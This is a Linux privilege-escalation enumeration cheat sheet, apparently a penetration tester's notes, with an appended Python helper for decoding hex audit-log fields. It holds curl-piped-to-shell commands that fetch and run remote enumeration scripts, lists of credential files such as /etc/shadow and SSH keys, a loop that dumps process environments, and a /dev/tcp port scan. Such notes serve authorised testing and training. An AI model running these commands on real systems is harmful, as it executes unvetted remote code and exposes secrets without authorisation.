####
Enum
####

************
Things to do
************

| Basic enum
| https://book.hacktricks.xyz/linux-hardening/privilege-escalation
| https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#references

.. code-block:: bash

    # First things to check
    id                                    # whoami & groups
    cat /etc/issue /etc/os-release        # OS
    uname -a                              # kernel version; always check online for CVEs
    cat /etc/passwd                       # users
    cat /etc/fstab                        # mount points
    ps faxwu | cat                        # process tree
    lscpu                                 # architecture
    cat /etc/shells                       # available shells
    cat /etc/group | grep -v ':$'         # groups that have members
    getent group sudo                     # sudo members

    # System activity
    lastlog
    w

    # System services and installations
    dpkg -l | cat                         # installed packages
    systemctl --type=service | cat        # list services

    # Network
    ss -lapunte | cat
    netstat -ntlp | cat
    ip a
    ip route
    route
    routel
    cat /etc/iptables/rules.v4
    iptables -L
    arp -a

    # Files
    ls -ltrha / /opt /srv /home/* /root/
    ls -ltrha /tmp /var/tmp /dev/shm
    ls -ltrha /var/www/*
    find /home/ -type f -printf '%T@ %p\n' | sort -nr | head -20                # recent files
    find /home/ -type f -printf '%T@:%TY-%Tm-%Td %TH:%TM %p\n' | sort -n | cut -d: -f2-
    find /home/ -type f -size +0
    find /home -type f -size +0 -name ".*" -exec ls -l {} \; 2>/dev/null        # hidden files
    find /home -type d -name ".*" -ls 2>/dev/null                               # hidden dirs

    sudo -l    # if you need a TTY: python3 -c 'import pty; pty.spawn("/bin/bash")'

    find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null    # all SUID binaries
    find / -perm -6000 -exec ls -ldb {} \; 2>/dev/null    # binaries with both SUID and SGID set (-2000 for SGID only)
    find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;    # capabilities
    find / -perm -u=s -type f 2>/dev/null
    find / -type f \( -user userblabla -o -group userblabla \) -size +0 -exec file {} + 2>/dev/null    # files owned by a given user/group

    mount
    lsblk
    find / -writable -type d 2>/dev/null
    cat ~/.bashrc
    /usr/sbin/getcap -r / 2>/dev/null
    cat /etc/fstab | grep -v "#" | column -t    # unmounted file systems

    # Environment of every process
    cd /proc/ ; for i in [0-9]* ; do echo -e "\n## $i $(ps -fp $i 2>/dev/null)" ; cat $i/environ 2>/dev/null | tr '\0' '\n' | strings ; done

    # Crons
    ls -lah /etc/cron*
    crontab -l
    grep "CRON" /var/log/syslog

    # AppArmor status
    aa-status

    # Modules
    lsmod
    /sbin/modinfo interestingmodule

*******
Scripts
*******

LinPEAS
*******

.. code-block:: bash

    curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

LinEnum
*******

.. code-block:: bash

    curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh

SUID Enum
*********

| Enumerate SUID programs with Python 2/3 built-in modules
| https://github.com/Anon-Exploiter/SUID3NUM

.. code-block:: bash

    curl https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py | python

*************
Watch Process
*************

| Watch for existing and new processes
| https://github.com/DominicBreuker/pspy

*****************
Interesting Files
*****************

Public
******

.. code-block:: bash

    /etc/issue
    /etc/passwd
    /etc/group

Root
****

.. code-block:: bash

    /etc/sudoers
    /etc/shadow
    /etc/master.passwd    # OpenBSD
    /var/spool/cron/crontabs/*
    /var/spool/cron/*

User
****

.. code-block:: bash

    /home/*/.bash_history
    /home/*/.ssh/*

Auditd (adm)
************

When parsing audit logs you may encounter hex-encoded data: auditd hex-encodes a field value that contains spaces or quotes, while values it did not encode are double-quoted.

.. code-block:: bash

    # decode every unquoted (hex) cmd= and data= value found in the audit logs
    for VAR in cmd data ; do
        grep -oh "$VAR=[0-9A-Fa-f]\+" /var/log/audit/audit.log* | while read -r DATA ; do
            echo "${DATA#*=}" | xxd -r -p | tr -dc '[:print:]\t\n'
            echo
        done
    done

**********
Scan Ports
**********

| Retrieve hidden ports without a scanner or netstat

.. code-block:: bash

    bash -c 'for i in {1..65535};do echo>/dev/tcp/127.0.0.1/$i&&echo OK $i;done' 2>/dev/null

********
Binaries
********

| When you encounter a binary without knowing what it does, you can use strace to list its system calls

.. code-block:: bash

    strace binaryname
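The hex decoding from the Auditd (adm) section above, as an added worked example in Python (not part of the original cheat sheet): it picks out unquoted `cmd=`, `data=` and `proctitle=` values, decodes them and strips non-printable bytes the way the shell one-liner does. The audit records it runs over are constructed sample lines, not output from a real system.

```python
import re
import sys

# auditd hex-encodes a field value that contains spaces, quotes or other
# awkward bytes; a value it did not encode is double-quoted instead.
# Matching bare even-length hex runs therefore selects only encoded values.
HEX_FIELD = re.compile(r'\b(cmd|data|proctitle)=((?:[0-9A-Fa-f]{2})+)\b')


def decode_hex_field(hexval):
    """Decode one hex-encoded audit value to printable text.

    NUL bytes (argv separators in proctitle) become spaces; any other
    non-printable byte is dropped, like the tr in the shell one-liner.
    """
    text = bytes.fromhex(hexval).replace(b'\x00', b' ').decode('utf-8', 'replace')
    return ''.join(c for c in text if c.isprintable() or c in '\t\n')


def decode_audit_lines(lines):
    """Return (record_type, field, decoded_value) for each encoded field."""
    found = []
    for line in lines:
        m = re.match(r'type=(\S+)', line)
        rtype = m.group(1) if m else '?'
        for field, hexval in HEX_FIELD.findall(line):
            found.append((rtype, field, decode_hex_field(hexval)))
    return found


# Constructed sample records, not taken from a real system.
SAMPLE_LOG = [
    "type=USER_CMD msg=audit(1700000000.100:201): pid=4242 uid=1000 auid=1000 "
    "ses=3 msg='cwd=\"/home/alice\" cmd=6C73202D6C61202F726F6F74 "
    "exe=\"/usr/bin/sudo\" terminal=pts/0 res=success'",
    # keystrokes recorded by pam_tty_audit; 0D is the Enter key
    "type=TTY msg=audit(1700000000.200:202): tty pid=4243 uid=1000 auid=1000 "
    "ses=3 major=136 minor=0 comm=\"bash\" data=69640D",
    "type=PROCTITLE msg=audit(1700000000.300:203): "
    "proctitle=7375646F006C73002D6C61002F726F6F74",
    # an unencoded (quoted) value is left alone
    "type=USER_CMD msg=audit(1700000000.400:204): pid=4244 uid=1000 auid=1000 "
    "ses=3 msg='cwd=\"/home/alice\" cmd=\"id\" exe=\"/usr/bin/sudo\" res=success'",
]

if __name__ == "__main__":
    # pass a path to read a real audit.log; otherwise use the sample above
    lines = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG
    for rtype, field, value in decode_audit_lines(lines):
        print(f"{rtype:<10} {field}={value}")
```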